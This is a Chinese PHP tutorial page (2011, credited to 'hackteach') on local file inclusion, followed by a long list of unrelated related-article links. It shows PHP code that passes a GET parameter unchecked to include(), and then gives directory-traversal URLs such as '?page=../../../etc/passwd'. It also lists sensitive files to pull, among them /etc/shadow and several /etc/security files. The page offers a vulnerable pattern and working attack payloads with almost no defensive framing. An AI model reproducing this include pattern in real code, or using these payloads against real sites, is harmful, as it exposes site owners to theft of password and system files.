编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

PHP 抓取新浪读书频道的小说并生成txt电子书的代码

Dec 18 PHP

PHP5.3的垃圾回收机制(动态存储分配方案)深入理解

Dec 10 PHP

PHP设计模式之解释器模式的深入解析

Jun 13 PHP

编译PHP报错configure error Cannot find libmysqlclient under usr的解决方法

Jun 27 PHP

php判断文件上传类型及过滤不安全数据的方法

Dec 17 PHP

PHP5.3新特性小结

Feb 14 PHP

PHP 实现等比压缩图片尺寸和大小实例代码

Oct 08 PHP

Yii框架扩展CGridView增加导出CSV功能的方法

May 24 PHP

PHP回调函数与匿名函数实例详解

Aug 16 PHP

PHP校验15位和18位身份证号的类封装

Nov 07 PHP

实例讲解PHP验证邮箱是否合格

Jan 28 PHP

PHP连接MySQL数据库三种实现方法

Dec 10 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

dataBinding(1) NTP(1) K8s(1) ip2region(1) RestTemplate(1) Hive(5) Quartz(1) HttpClient(1) Windows Server(4) Windows Server 2022(3)

You might like

PHP与已存在的Java应用程序集成

2006/10/09 PHP

php判断访问IP的方法

2015/06/19 PHP

PHP封装的字符串加密解密函数

2015/12/18 PHP

Zend Framework教程之请求对象的封装Zend_Controller_Request实例详解

2016/03/07 PHP

php使用curl_init()和curl_multi_init()多线程的速度比较详解

2018/08/15 PHP

php操作redis数据库常见方法实例总结

2020/02/20 PHP

对YUI扩展的Gird组件 Part-2

2007/03/10 Javascript

JS事件在IE与FF中的区别详细解析

2013/11/20 Javascript

jQuery中设置form表单中action值的实现方法

2016/05/25 Javascript

js基本算法:冒泡排序,二分查找的简单实例

2016/10/08 Javascript

微信小程序 Canvas增强组件实例详解及源码分享

2017/01/04 Javascript

详解Vue中状态管理Vuex

2017/05/11 Javascript

基于input框覆盖掉数字英文的实例讲解

2017/07/21 Javascript

vue中,在本地缓存中读写数据的方法

2018/09/21 Javascript

vue返回上一页面时回到原先滚动的位置的方法

2018/12/20 Javascript

JS删除String里某个字符的方法

2021/01/06 Javascript

Vue如何基于vue-i18n实现多国语言兼容

2020/07/17 Javascript

Vue中ref和$refs的介绍以及使用方法示例

2021/01/11 Vue.js

[40:29]2018DOTA2亚洲邀请赛 4.7总决赛 LGD vs Mineski 第一场

2018/04/10 DOTA

python使用7z解压apk包的方法

2015/04/18 Python

NumPy 如何生成多维数组的方法

2018/02/05 Python

python中abs&map&reduce简介

2018/02/20 Python

基于python3 OpenCV3实现静态图片人脸识别

2018/05/25 Python

pyspark 读取csv文件创建DataFrame的两种方法

2018/06/07 Python

Python中常用的8种字符串操作方法

2019/05/06 Python

Python列表list操作相关知识小结

2020/01/29 Python

党员创先争优承诺书

2014/03/26 职场文书

群众路线教育党课主持词

2014/04/01 职场文书

骨干教师培训方案

2014/05/06 职场文书

我为党旗添光彩演讲稿

2014/09/13 职场文书

就业协议书怎么填

2014/09/15 职场文书

2014年村官工作总结

2014/11/24 职场文书

大学生违纪检讨书范文

2015/05/07 职场文书

户外拓展训练感想

2015/08/07 职场文书

用JS实现飞机大战小游戏

2021/06/09 Javascript

git中cherry-pick命令的使用教程

2022/06/25 Servers